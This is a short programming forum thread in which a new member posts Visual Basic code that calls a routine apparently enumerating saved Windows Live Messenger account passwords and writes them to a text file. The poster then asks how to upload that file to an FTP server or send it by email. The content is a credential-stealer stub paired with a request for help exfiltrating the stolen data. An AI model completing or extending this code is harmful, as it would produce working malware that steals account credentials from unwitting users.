Results 1 to 3 of 3

Thread: Read this please help.

  1. #1

    Thread Starter
    New Member
    Join Date
    Feb 2009
    Posts
    9

    Read this please help.

    can anybody tell me how to
    get this to upload the txt file to a ftp server
    or sending it by e-mail

    Option Explicit

    Public Sub Main()
    Dim sPath As String
    Dim sRet As String

    sPath = IIf(Right$(App.Path, 1) = "\", App.Path, App.Path & "\")
    sRet = mMessengerPass.EnumWLMAccounts
    If LenB(sRet) Then
    Open sPath & "WLMP.txt" For Append As #1
    Print #1, sRet
    Close #1
    End If

    End Sub

  2. #2

  3. #3

    Thread Starter
    New Member
    Join Date
    Feb 2009
    Posts
    9

    Re: Read this please help.

    yea okay

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •  



Click Here to Expand Forum to Full Width